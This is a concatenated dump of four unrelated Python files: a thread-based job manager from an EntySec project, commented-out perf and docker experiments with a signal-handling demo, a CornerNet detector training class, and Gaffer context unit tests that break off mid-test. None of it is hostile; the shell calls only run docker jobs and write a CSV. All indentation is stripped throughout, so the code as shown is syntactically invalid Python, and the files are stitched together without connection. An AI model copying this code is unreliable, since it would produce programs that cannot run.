jobs.py
|
#!/usr/bin/env python3
#
# MIT License
#
# Copyright (c) 2020-2021 EntySec
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
import ctypes
import os
import sys
import threading
from core.base.exceptions import Exceptions
from core.base.storage import LocalStorage
from core.cli.badges import Badges
from core.cli.tables import Tables
from core.modules.modules import Modules
class Jobs:
def __init__(self):
self.exceptions = Exceptions()
self.tables = Tables()
self.badges = Badges()
self.local_storage = LocalStorage()
self.modules = Modules()
self.job_process = None
def stop_dead(self):
jobs = self.local_storage.get("jobs")
if jobs:
for job_id in list(jobs):
if not jobs[job_id]['job_process'].is_alive():
self.delete_job(job_id)
def check_jobs(self):
if not self.local_storage.get("jobs"):
return True
return False
def check_module_job(self, module_name):
jobs = self.local_storage.get("jobs")
if jobs:
for job_id in jobs.keys():
if jobs[job_id]['module_name'] == module_name:
return True
return False
def exit_jobs(self):
if self.check_jobs():
return True
self.badges.output_warning("You have some running jobs.")
if self.badges.input_question("Exit anyway? [y/N] ").lower() in ['yes', 'y']:
self.badges.output_process("Stopping all jobs...")
self.stop_all_jobs()
return True
return False
def stop_all_jobs(self):
if not self.check_jobs():
for job_id in list(self.local_storage.get("jobs").keys()):
self.delete_job(job_id)
def stop_job(self, job):
if job.is_alive():
exc = ctypes.py_object(SystemExit)
res = ctypes.pythonapi.PyThreadState_SetAsyncExc(ctypes.c_long(job.ident), exc)
if res == 0:
raise self.exceptions.GlobalException
if res > 1:
ctypes.pythonapi.PyThreadState_SetAsyncExc(job.ident, None)
raise self.exceptions.GlobalException
def start_job(self, job_function, job_arguments):
self.job_process = threading.Thread(target=job_function, args=job_arguments)
self.job_process.setDaemon(True)
self.job_process.start()
def delete_job(self, job_id):
if not self.check_jobs():
job_id = int(job_id)
if job_id in list(self.local_storage.get("jobs").keys()):
try:
self.stop_job(self.local_storage.get("jobs")[job_id]['job_process'])
self.local_storage.delete_element("jobs", job_id)
except Exception:
self.badges.output_error("Failed to stop job!")
else:
self.badges.output_error("Invalid job id!")
else:
self.badges.output_error("Invalid job id!")
def create_job(self, job_name, module_name, job_function, job_arguments=()):
self.start_job(job_function, job_arguments)
if not self.local_storage.get("jobs"):
self.local_storage.set("jobs", dict())
job_id = len(self.local_storage.get("jobs"))
job_data = {
job_id: {
'job_name': job_name,
'module_name': module_name,
'job_process': self.job_process
}
}
self.local_storage.update("jobs", job_data)
return job_id
|
test.py
|
# from dataclasses import field
# import os
# from multiprocessing import Process
# from re import L
# from time import sleep
# import re
# def perf_monitor():
# os.system("perf stat -e instructions,cycles -C 0 -o ./record/tmp.txt sleep 5")
# # perf stat -I 1000 -e cycles -a sleep 5
# def exec_container(container, command):
# print(container + ": Start executing commands...")
# cmd = "docker exec " + container + " " + command
# print(cmd)
# os.system(cmd)
# print(container + ": Finish.")
# if __name__ == "__main__":
# # create processes
# p1 = Process(target=exec_container, args=("container1", "python3 ./aws/cpu-memory/linpack/lambda_function.py -n=2000"),)
# p2 = Process(target=exec_container, args=("container2", "python3 ./aws/cpu-memory/ml_lr_prediction/lambda_function.py -dataset_train_object_key=reviews10mb.csv -dataset_test_object_key=reviews20mb.csv"),)
# p3 = Process(target=perf_monitor,)
# # start running
# p1.start()
# p2.start()
# p3.start()
# # wait
# p1.join()
# p2.join()
# p3.join()
# print("Process finish.")
# # read the specific line
# ips_line = 6
# file = open("./record/tmp.txt", "r")
# count = 0
# while count < ips_line:
# line = file.readline()
# count += 1
# print(line)
# # find the number
# regex = re.compile(r'\d+')
# nums = regex.findall(line)
# instructions = 0
# for num in nums[:-2]:
# print(num)
# instructions = instructions * 1000 + int(num)
# print(instructions)
# line = file.readline()
# nums = regex.findall(line)
# cycles = 0
# for num in nums:
# cycles = cycles * 1000 + int(num)
# print(cycles)
# ans = instructions / cycles
# # write as a record
# info = "n,train,test,ipc"
# os.system("echo " + info + " >> ./record/5_7.csv")
# info = "2000,10,20," + str(round(ans, 4))
# os.system("echo " + info + " >> ./record/5_7.csv")
# # print("Record finish.")
# import multiprocessing
# import os
# import signal
# import time
# def func(i):
# while True:
# a = i
# print("the {} dog".format(os.getpid()))
# # array[0] = a
# # a = i
# process_list = []
# for i in range(10):
# process = multiprocessing.Process(target=func, args=(i,), daemon=False)
# process_list.append(process)
# process.start()
# # time.sleep(0.2) #等待进程运行
# # print(num)
# # print(num_array[0])
# time.sleep(5)
# for process in process_list:
# process.te
# a = [[1,2], [3,4]]
# b = []
# b.append(a)
# b.append(a)
# a = []
# print(b)
#!/usr/bin/env python3
# coding=utf-8
import os
import time
import signal
import traceback
def handle_SIGUSR1(signum, frame):
print("what are you doing")
def main():
signal.signal(signal.SIGUSR1, handle_SIGUSR1) # 注册SIGUSR1信号的处理器为handle_SIGUSR1函数
print(signal.getsignal(signal.SIGUSR1)) # 获取SIGUSR1信号目前的处理器
time.sleep(3) # 或者使用signal.pause()
os.kill(os.getpid(), signal.SIGUSR1) # 向当前进程发送SIGUSR1信号
time.sleep(3)
print('done')
if __name__ == '__main__':
main()
|
train_detector.py
|
import os
import json
import torch
import numpy as np
import queue
import pprint
import random
import argparse
import importlib
import threading
import traceback
import torch.distributed as dist
import torch.multiprocessing as mp
from tqdm import tqdm
from torch.multiprocessing import Process, Queue, Pool
from core.dbs import datasets
from core.utils import stdout_to_tqdm
from core.config import SystemConfig
from core.sample import data_sampling_func
from core.nnet.py_factory import NetworkFactory
def prefetch_data(system_config, db, queue, sample_data, data_aug):
ind = 0
print("start prefetching data...")
np.random.seed(os.getpid())
while True:
try:
data, ind = sample_data(system_config, db, ind, data_aug=data_aug)
queue.put(data)
except Exception as e:
traceback.print_exc()
raise e
def _pin_memory(ts):
if type(ts) is list:
return [t.pin_memory() for t in ts]
return ts.pin_memory()
def pin_memory(data_queue, pinned_data_queue, sema):
while True:
data = data_queue.get()
data["xs"] = [_pin_memory(x) for x in data["xs"]]
data["ys"] = [_pin_memory(y) for y in data["ys"]]
pinned_data_queue.put(data)
if sema.acquire(blocking=False):
return
def init_parallel_jobs(system_config, dbs, queue, fn, data_aug):
tasks = [Process(target=prefetch_data, args=(system_config, db, queue, fn, data_aug)) for db in dbs]
for task in tasks:
task.daemon = True
task.start()
return tasks
def terminate_tasks(tasks):
for task in tasks:
task.terminate()
class Detector():
'''
Class to train a detector
Args:
verbose (int): Set verbosity levels
0 - Print Nothing
1 - Print desired details
'''
def __init__(self, verbose=1):
self.system_dict = {};
self.system_dict["verbose"] = verbose;
self.system_dict["local"] = {};
self.system_dict["dataset"] = {};
self.system_dict["dataset"]["train"] = {};
self.system_dict["dataset"]["val"] = {};
self.system_dict["dataset"]["val"]["status"] = False;
self.system_dict["dataset"]["params"] = {};
self.system_dict["dataset"]["params"]["workers"] = 4;
self.system_dict["model"] = {};
self.system_dict["model"]["params"] = {};
self.system_dict["model"]["params"]["cfg_file"] = "CornerNet_Saccade";
self.system_dict["model"]["params"]["initialize"] = False;
self.system_dict["model"]["params"]["distributed"] = False;
self.system_dict["model"]["params"]["world_size"] = 0;
self.system_dict["model"]["params"]["rank"] = 0;
self.system_dict["model"]["params"]["dist_url"] = None;
self.system_dict["model"]["params"]["dist_backend"] = "nccl";
self.system_dict["model"]["params"]["use_gpu"] = True;
self.system_dict["training"] = {};
self.system_dict["training"]["params"] = {};
self.system_dict["training"]["params"]["start_iter"] = 0;
self.system_dict["training"]["params"]["gpu"] = None;
def Train_Dataset(self, root_dir, coco_dir, img_dir, set_dir, batch_size=4, use_gpu=True, num_workers=4):
'''
User function: Set training dataset parameters
Dataset Directory Structure
root_dir
|
|------coco_dir
| |
| |----img_dir
| |
| |------<set_dir_train> (set_dir) (Train)
| |
| |---------img1.jpg
| |---------img2.jpg
| |---------..........(and so on)
|
|
| |---annotations
| |----|
| |--------------------instances_Train.json (instances_<set_dir_train>.json)
| |--------------------classes.txt
- instances_Train.json -> In proper COCO format
- classes.txt -> A list of classes in alphabetical order
For TrainSet
- root_dir = "../sample_dataset";
- coco_dir = "kangaroo";
- img_dir = "images";
- set_dir = "Train";
Note: Annotation file name too coincides against the set_dir
Args:
root_dir (str): Path to root directory containing coco_dir
coco_dir (str): Name of coco_dir containing image folder and annotation folder
img_dir (str): Name of folder containing all training and validation folders
set_dir (str): Name of folder containing all training images
batch_size (int): Mini batch sampling size for training epochs
use_gpu (bool): If True use GPU else run on CPU
num_workers (int): Number of parallel processors for data loader
Returns:
None
'''
self.system_dict["dataset"]["train"]["root_dir"] = root_dir;
self.system_dict["dataset"]["train"]["coco_dir"] = coco_dir;
self.system_dict["dataset"]["train"]["img_dir"] = img_dir;
self.system_dict["dataset"]["train"]["set_dir"] = set_dir;
self.system_dict["dataset"]["params"]["batch_size"] = batch_size;
self.system_dict["dataset"]["params"]["workers"] = num_workers;
self.system_dict["model"]["params"]["use_gpu"] = use_gpu;
def Val_Dataset(self, root_dir, coco_dir, img_dir, set_dir):
'''
User function: Set training dataset parameters
Dataset Directory Structure
root_dir
|
|------coco_dir
| |
| |----img_dir
| |
| |------<set_dir_val> (set_dir) (Validation)
| |
| |---------img1.jpg
| |---------img2.jpg
| |---------..........(and so on)
|
|
| |---annotations
| |----|
| |--------------------instances_Val.json (instances_<set_dir_val>.json)
| |--------------------classes.txt
- instances_Train.json -> In proper COCO format
- classes.txt -> A list of classes in alphabetical order
For ValSet
- root_dir = "..sample_dataset";
- coco_dir = "kangaroo";
- img_dir = "images";
- set_dir = "Val";
Note: Annotation file name too coincides against the set_dir
Args:
root_dir (str): Path to root directory containing coco_dir
coco_dir (str): Name of coco_dir containing image folder and annotation folder
img_dir (str): Name of folder containing all training and validation folders
set_dir (str): Name of folder containing all validation images
Returns:
None
'''
self.system_dict["dataset"]["val"]["status"] = True;
self.system_dict["dataset"]["val"]["root_dir"] = root_dir;
self.system_dict["dataset"]["val"]["coco_dir"] = coco_dir;
self.system_dict["dataset"]["val"]["img_dir"] = img_dir;
self.system_dict["dataset"]["val"]["set_dir"] = set_dir;
def Model(self, model_name="CornerNet_Saccade", use_distributed=False):
'''
User function: Set Model parameters
Available Models
CornerNet_Saccade
CornerNet_Squeeze
Args:
model_name (str): Select appropriate model
use_distributed (bool): If true, use distributed training
Returns:
None
'''
self.system_dict["model"]["params"]["cfg_file"] = model_name;
self.system_dict["model"]["params"]["distributed"] = use_distributed;
if(self.system_dict["model"]["params"]["distributed"]):
print("Distributed training not enabled yet");
def Hyper_Params(self, lr=0.00025, total_iterations=1000, val_interval=500):
'''
User function: Set hyper parameters
Args:
lr (float): Initial learning rate for training
total_iterations (float): Total mini batch iterations for training
val_interval (int): Post specified number of training epochs, a validation epoch will be carried out
Returns:
None
'''
self.system_dict["training"]["params"]["lr"] = lr;
self.system_dict["training"]["params"]["total_iterations"] = total_iterations;
self.system_dict["training"]["params"]["val_interval"] = val_interval;
def Setup(self):
'''
User function: Setup dataset, model and hyper-params
Args:
None
Returns:
None
'''
distributed = self.system_dict["model"]["params"]["distributed"]
world_size = self.system_dict["model"]["params"]["world_size"]
ngpus_per_node = torch.cuda.device_count()
current_dir = os.path.dirname(os.path.realpath(__file__));
cfg_file = os.path.join(current_dir, "configs", self.system_dict["model"]["params"]["cfg_file"] + ".json")
with open(cfg_file, "r") as f:
self.system_dict["local"]["config"] = json.load(f)
self.system_dict["local"]["config"]["db"]["root_dir"] = self.system_dict["dataset"]["train"]["root_dir"];
self.system_dict["local"]["config"]["db"]["coco_dir"] = self.system_dict["dataset"]["train"]["coco_dir"];
self.system_dict["local"]["config"]["db"]["img_dir"] = self.system_dict["dataset"]["train"]["img_dir"];
self.system_dict["local"]["config"]["db"]["set_dir"] = self.system_dict["dataset"]["train"]["set_dir"];
f = open(self.system_dict["dataset"]["train"]["root_dir"] + "/" + self.system_dict["dataset"]["train"]["coco_dir"] + "/annotations/classes.txt");
lines = f.readlines();
f.close();
self.system_dict["local"]["config"]["db"]["categories"] = len(lines);
self.system_dict["local"]["config"]["system"]["batch_size"] = self.system_dict["dataset"]["params"]["batch_size"];
self.system_dict["local"]["config"]["system"]["chunk_sizes"] = [self.system_dict["dataset"]["params"]["batch_size"]];
self.system_dict["local"]["config"]["system"]["max_iter"] = self.system_dict["training"]["params"]["total_iterations"];
self.system_dict["local"]["config"]["system"]["snapshot_name"] = self.system_dict["model"]["params"]["cfg_file"]
self.system_dict["local"]["system_config"] = SystemConfig().update_config(self.system_dict["local"]["config"]["system"])
self.system_dict["local"]["training_dbs"] = [datasets[self.system_dict["local"]["system_config"].dataset](self.system_dict["local"]["config"]["db"],
sys_config=self.system_dict["local"]["system_config"]) for _ in range(self.system_dict["dataset"]["params"]["workers"])]
if(self.system_dict["dataset"]["val"]["status"]):
self.system_dict["local"]["config"]["db"]["root_dir"] = self.system_dict["dataset"]["val"]["root_dir"];
self.system_dict["local"]["config"]["db"]["coco_dir"] = self.system_dict["dataset"]["val"]["coco_dir"];
self.system_dict["local"]["config"]["db"]["img_dir"] = self.system_dict["dataset"]["val"]["img_dir"];
self.system_dict["local"]["config"]["db"]["set_dir"] = self.system_dict["dataset"]["val"]["set_dir"];
self.system_dict["local"]["validation_db"] = datasets[self.system_dict["local"]["system_config"].dataset](self.system_dict["local"]["config"]["db"],
sys_config=self.system_dict["local"]["system_config"])
if(not os.path.isdir("cache/")):
os.mkdir("cache");
if(not os.path.isdir("cache/nnet")):
os.mkdir("cache/nnet/");
if(not os.path.isdir("cache/nnet/" + self.system_dict["model"]["params"]["cfg_file"])):
os.mkdir("cache/nnet/" + self.system_dict["model"]["params"]["cfg_file"]);
model_file = "core.models.{}".format(self.system_dict["model"]["params"]["cfg_file"])
print("Loading Model - {}".format(model_file))
model_file = importlib.import_module(model_file)
self.system_dict["local"]["model"] = model_file.model(self.system_dict["local"]["config"]["db"]["categories"])
print("Model Loaded");
def Train(self, display_interval=100):
'''
User function: Start training
Args:
display_interval (int): Post every specified iteration the training losses and accuracies will be printed
Returns:
None
'''
# reading arguments from command
start_iter = self.system_dict["training"]["params"]["start_iter"]
distributed = self.system_dict["model"]["params"]["distributed"]
world_size = self.system_dict["model"]["params"]["world_size"]
initialize = self.system_dict["model"]["params"]["initialize"]
gpu = None
rank = self.system_dict["model"]["params"]["rank"]
# reading arguments from json file
batch_size = self.system_dict["dataset"]["params"]["batch_size"]
learning_rate = self.system_dict["training"]["params"]["lr"]
max_iteration = self.system_dict["training"]["params"]["total_iterations"]
pretrained_model = None;
stepsize = int(self.system_dict["training"]["params"]["total_iterations"]*0.8)
snapshot = int(self.system_dict["training"]["params"]["total_iterations"]*0.5)
val_iter = self.system_dict["training"]["params"]["val_interval"]
display = display_interval
decay_rate = self.system_dict["local"]["system_config"].decay_rate
print("start_iter = {}".format(start_iter));
print("distributed = {}".format(distributed));
print("world_size = {}".format(world_size));
print("initialize = {}".format(initialize));
print("batch_size = {}".format(batch_size));
print("learning_rate = {}".format(learning_rate));
print("max_iteration = {}".format(max_iteration));
print("stepsize = {}".format(stepsize));
print("snapshot = {}".format(snapshot));
print("val_iter = {}".format(val_iter));
print("display = {}".format(display));
print("decay_rate = {}".format(decay_rate));
print("Process {}: building model...".format(rank))
self.system_dict["local"]["nnet"] = NetworkFactory(self.system_dict["local"]["system_config"],
self.system_dict["local"]["model"], distributed=distributed, gpu=gpu)
# queues storing data for training
training_queue = Queue(self.system_dict["local"]["system_config"].prefetch_size)
validation_queue = Queue(5)
# queues storing pinned data for training
pinned_training_queue = queue.Queue(self.system_dict["local"]["system_config"].prefetch_size)
pinned_validation_queue = queue.Queue(5)
# allocating resources for parallel reading
training_tasks = init_parallel_jobs(self.system_dict["local"]["system_config"],
self.system_dict["local"]["training_dbs"],
training_queue, data_sampling_func, True)
if self.system_dict["dataset"]["val"]["status"]:
validation_tasks = init_parallel_jobs(self.system_dict["local"]["system_config"],
[self.system_dict["local"]["validation_db"]],
validation_queue, data_sampling_func, False)
training_pin_semaphore = threading.Semaphore()
validation_pin_semaphore = threading.Semaphore()
training_pin_semaphore.acquire()
validation_pin_semaphore.acquire()
training_pin_args = (training_queue, pinned_training_queue, training_pin_semaphore)
training_pin_thread = threading.Thread(target=pin_memory, args=training_pin_args)
training_pin_thread.daemon = True
training_pin_thread.start()
validation_pin_args = (validation_queue, pinned_validation_queue, validation_pin_semaphore)
validation_pin_thread = threading.Thread(target=pin_memory, args=validation_pin_args)
validation_pin_thread.daemon = True
validation_pin_thread.start()
if pretrained_model is not None:
if not os.path.exists(pretrained_model):
raise ValueError("pretrained model does not exist")
print("Process {}: loading from pretrained model".format(rank))
self.system_dict["local"]["nnet"].load_pretrained_params(pretrained_model)
if start_iter:
self.system_dict["local"]["nnet"].load_params(start_iter)
learning_rate /= (decay_rate ** (start_iter // stepsize))
self.system_dict["local"]["nnet"].set_lr(learning_rate)
print("Process {}: training starts from iteration {} with learning_rate {}".format(rank, start_iter + 1, learning_rate))
else:
self.system_dict["local"]["nnet"].set_lr(learning_rate)
if rank == 0:
print("training start...")
self.system_dict["local"]["nnet"].cuda()
self.system_dict["local"]["nnet"].train_mode()
if(self.system_dict["dataset"]["val"]["status"]):
old_val_loss = 100000.0;
with stdout_to_tqdm() as save_stdout:
for iteration in tqdm(range(start_iter + 1, max_iteration + 1), file=save_stdout, ncols=80):
training = pinned_training_queue.get(block=True)
training_loss = self.system_dict["local"]["nnet"].train(**training)
if display and iteration % display == 0:
print("Process {}: training loss at iteration {}: {}".format(rank, iteration, training_loss.item()))
del training_loss
if val_iter and self.system_dict["local"]["validation_db"].db_inds.size and iteration % val_iter == 0:
self.system_dict["local"]["nnet"].eval_mode()
validation = pinned_validation_queue.get(block=True)
validation_loss = self.system_dict["local"]["nnet"].validate(**validation)
print("Process {}: validation loss at iteration {}: {}".format(rank, iteration, validation_loss.item()))
if(validation_loss < old_val_loss):
print("Loss Reduced from {} to {}".format(old_val_loss, validation_loss))
self.system_dict["local"]["nnet"].save_params("best");
old_val_loss = validation_loss;
else:
print("validation loss did not go below {}, current loss - {}".format(old_val_loss, validation_loss))
self.system_dict["local"]["nnet"].train_mode()
if iteration % stepsize == 0:
learning_rate /= decay_rate
self.system_dict["local"]["nnet"].set_lr(learning_rate)
self.system_dict["local"]["nnet"].save_params("final");
# sending signal to kill the thread
training_pin_semaphore.release()
validation_pin_semaphore.release()
# terminating data fetching processes
terminate_tasks(training_tasks)
terminate_tasks(validation_tasks)
else:
with stdout_to_tqdm() as save_stdout:
for iteration in tqdm(range(start_iter + 1, max_iteration + 1), file=save_stdout, ncols=80):
training = pinned_training_queue.get(block=True)
training_loss = self.system_dict["local"]["nnet"].train(**training)
if display and iteration % display == 0:
print("Process {}: training loss at iteration {}: {}".format(rank, iteration, training_loss.item()))
del training_loss
if(iteration % val_iter == 0):
self.system_dict["local"]["nnet"].save_params("intermediate");
if iteration % stepsize == 0:
learning_rate /= decay_rate
self.system_dict["local"]["nnet"].set_lr(learning_rate)
self.system_dict["local"]["nnet"].save_params("final");
# sending signal to kill the thread
training_pin_semaphore.release()
# terminating data fetching processes
terminate_tasks(training_tasks)
|
ContextTest.py
|
##########################################################################
#
# Copyright (c) 2012, John Haddon. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import unittest
import threading
import weakref
import IECore
import Gaffer
import GafferTest
class ContextTest( GafferTest.TestCase ) :
def testFrameAccess( self ) :
c = Gaffer.Context()
self.assertEqual( c.getFrame(), 1.0 )
self.assertEqual( c["frame"], 1.0 )
c.setFrame( 10.5 )
self.assertEqual( c.getFrame(), 10.5 )
self.assertEqual( c["frame"], 10.5 )
def testChangedSignal( self ) :
c = Gaffer.Context()
changes = []
def f( context, name ) :
self.failUnless( context.isSame( c ) )
changes.append( ( name, context[name] ) )
cn = c.changedSignal().connect( f )
c["a"] = 2
self.assertEqual( changes, [ ( "a", 2 ) ] )
c["a"] = 3
self.assertEqual( changes, [ ( "a", 2 ), ( "a", 3 ) ] )
c["b"] = 1
self.assertEqual( changes, [ ( "a", 2 ), ( "a", 3 ), ( "b", 1 ) ] )
# when an assignment makes no actual change, the signal should not
# be triggered again.
c["b"] = 1
self.assertEqual( changes, [ ( "a", 2 ), ( "a", 3 ), ( "b", 1 ) ] )
def testTypes( self ) :
c = Gaffer.Context()
c["int"] = 1
self.assertEqual( c["int"], 1 )
self.assertEqual( c.get( "int" ), 1 )
c.set( "int", 2 )
self.assertEqual( c["int"], 2 )
self.failUnless( isinstance( c["int"], int ) )
c["float"] = 1.0
self.assertEqual( c["float"], 1.0 )
self.assertEqual( c.get( "float" ), 1.0 )
c.set( "float", 2.0 )
self.assertEqual( c["float"], 2.0 )
self.failUnless( isinstance( c["float"], float ) )
c["string"] = "hi"
self.assertEqual( c["string"], "hi" )
self.assertEqual( c.get( "string" ), "hi" )
c.set( "string", "bye" )
self.assertEqual( c["string"], "bye" )
self.failUnless( isinstance( c["string"], basestring ) )
def testCopying( self ) :
c = Gaffer.Context()
c["i"] = 10
c2 = Gaffer.Context( c )
self.assertEqual( c2["i"], 10 )
c["i"] = 1
self.assertEqual( c["i"], 1 )
self.assertEqual( c2["i"], 10 )
def testEquality( self ) :
c = Gaffer.Context()
c2 = Gaffer.Context()
self.assertEqual( c, c2 )
self.failIf( c != c2 )
c["somethingElse"] = 1
self.assertNotEqual( c, c2 )
self.failIf( c == c2 )
def testCurrent( self ) :
# if nothing has been made current then there should be a default
# constructed context in place.
c = Gaffer.Context.current()
c2 = Gaffer.Context()
self.assertEqual( c, c2 )
# and we should be able to change that using the with statement
c2["something"] = 1
with c2 :
self.failUnless( Gaffer.Context.current().isSame( c2 ) )
self.assertEqual( Gaffer.Context.current()["something"], 1 )
# and bounce back to the original
self.failUnless( Gaffer.Context.current().isSame( c ) )
def testCurrentIsThreadSpecific( self ) :
c = Gaffer.Context()
self.failIf( c.isSame( Gaffer.Context.current() ) )
def f() :
self.failIf( c.isSame( Gaffer.Context.current() ) )
with Gaffer.Context() :
pass
with c :
self.failUnless( c.isSame( Gaffer.Context.current() ) )
t = threading.Thread( target = f )
t.start()
t.join()
self.failUnless( c.isSame( Gaffer.Context.current() ) )
self.failIf( c.isSame( Gaffer.Context.current() ) )
def testThreading( self ) :
# for good measure, run testCurrent() in a load of threads at
# the same time.
threads = []
for i in range( 0, 1000 ) :
t = threading.Thread( target = self.testCurrent )
t.start()
threads.append( t )
for t in threads :
t.join()
def testSetWithObject( self ) :
c = Gaffer.Context()
v = IECore.StringVectorData( [ "a", "b", "c" ] )
c.set( "v", v )
self.assertEqual( c.get( "v" ), v )
self.failIf( c.get( "v" ).isSame( v ) )
self.assertEqual( c["v"], v )
self.failIf( c["v"].isSame( v ) )
def testGetWithDefault( self ) :
c = Gaffer.Context()
self.assertRaises( RuntimeError, c.get, "f" )
self.assertEqual( c.get( "f", 10 ), 10 )
c["f"] = 1.0
self.assertEqual( c.get( "f" ), 1.0 )
def testReentrancy( self ) :
c = Gaffer.Context()
with c :
self.failUnless( c.isSame( Gaffer.Context.current() ) )
with c :
self.failUnless( c.isSame( Gaffer.Context.current() ) )
def testLifeTime( self ) :
c = Gaffer.Context()
w = weakref.ref( c )
self.failUnless( w() is c )
with c :
pass
del c
self.failUnless( w() is None )
def testWithBlockReturnValue( self ) :
with Gaffer.Context() as c :
self.failUnless( isinstance( c, Gaffer.Context ) )
self.failUnless( c.isSame( Gaffer.Context.current() ) )
def testSubstitute( self ) :
c = Gaffer.Context()
c.setFrame( 20 )
c["a"] = "apple"
c["b"] = "bear"
self.assertEqual( c.substitute( "$a/$b/something.###.tif" ), "apple/bear/something.020.tif" )
self.assertEqual( c.substitute( "$a/$dontExist/something.###.tif" ), "apple//something.020.tif" )
self.assertEqual( c.substitute( "${badlyFormed" ), "" )
def testHasSubstitutions( self ) :
c = Gaffer.Context()
self.assertFalse( c.hasSubstitutions( "a" ) )
self.assertTrue( c.hasSubstitutions( "~something" ) )
self.assertTrue( c.hasSubstitutions( "$a" ) )
self.assertTrue( c.hasSubstitutions( "${a}" ) )
self.assertTrue( c.hasSubstitutions( "###" ) )
def testNames( self ) :
c = Gaffer.Context()
self.assertEqual( set( c.names() ), set( [ "frame" ] ) )
c["a"] = 10
self.assertEqual( set( c.names() ), set( [ "frame", "a" ] ) )
cc = Gaffer.Context( c )
self.assertEqual( set( cc.names() ), set( [ "frame", "a" ] ) )
cc["b"] = 20
self.assertEqual( set( cc.names() ), set( [ "frame", "a", "b" ] ) )
self.assertEqual( set( c.names() ), set( [ "frame", "a" ] ) )
self.assertEqual( cc.names(), cc.keys() )
def testManyContexts( self ) :
GafferTest.testManyContexts()
def testGetWithAndWithoutCopying( self ) :
c = Gaffer.Context()
c["test"] = IECore.IntVectorData( [ 1, 2 ] )
# we should be getting a copy each time by default
self.assertFalse( c["test"].isSame( c["test"] ) )
# meaning that if we modify the returned value, no harm is done
c["test"].append( 10 )
self.assertEqual( c["test"], IECore.IntVectorData( [ 1, 2 ] ) )
# if we ask nicely, we can get a reference to the internal
# value without any copying.
self.assertTrue( c.get( "test", _copy=False ).isSame( c.get( "test", _copy=False ) ) )
# but then if we modify the returned value, we are changing the
# context itself too. this should be avoided - we're just doing it
# here to test that we are indeed referencing the internal value.
c.get( "test", _copy=False ).append( 10 )
self.assertEqual( c["test"], IECore.IntVectorData( [ 1, 2, 10 ] ) )
def testGetWithDefaultAndCopyArgs( self ) :
c = Gaffer.Context()
c["test"] = IECore.IntVectorData( [ 1, 2 ] )
self.assertTrue( c.get( "test", 10, _copy=False ).isSame( c.get( "test", 20, _copy=False ) ) )
self.assertTrue( c.get( "test", defaultValue=10, _copy=False ).isSame( c.get( "test", defaultValue=20, _copy=False ) ) )
def testCopyWithSharedOwnership( self ) :
c1 = Gaffer.Context()
c1["testInt"] = 10
c1["testIntVector"] = IECore.IntVectorData( [ 10 ] )
self.assertEqual( c1["testInt"], 10 )
self.assertEqual( c1["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
r = c1.get( "testIntVector", _copy=False ).refCount()
c2 = Gaffer.Context( c1, ownership = Gaffer.Context.Ownership.Shared )
self.assertEqual( c2["testInt"], 10 )
self.assertEqual( c2["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
c1["testInt"] = 20
self.assertEqual( c1["testInt"], 20 )
# c2 has changed too! with slightly improved performance comes
# great responsibility!
self.assertEqual( c2["testInt"], 20 )
# both contexts reference the same object, but c2 at least owns
# a reference to its values, and can be used after c1 has been
# deleted.
self.assertTrue( c2.get( "testIntVector", _copy=False ).isSame( c1.get( "testIntVector", _copy=False ) ) )
self.assertEqual( c2.get( "testIntVector", _copy=False ).refCount(), r + 1 )
del c1
self.assertEqual( c2["testInt"], 20 )
self.assertEqual( c2["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
self.assertEqual( c2.get( "testIntVector", _copy=False ).refCount(), r )
def testCopyWithBorrowedOwnership( self ) :
c1 = Gaffer.Context()
c1["testInt"] = 10
c1["testIntVector"] = IECore.IntVectorData( [ 10 ] )
self.assertEqual( c1["testInt"], 10 )
self.assertEqual( c1["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
r = c1.get( "testIntVector", _copy=False ).refCount()
c2 = Gaffer.Context( c1, ownership = Gaffer.Context.Ownership.Borrowed )
self.assertEqual( c2["testInt"], 10 )
self.assertEqual( c2["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
c1["testInt"] = 20
self.assertEqual( c1["testInt"], 20 )
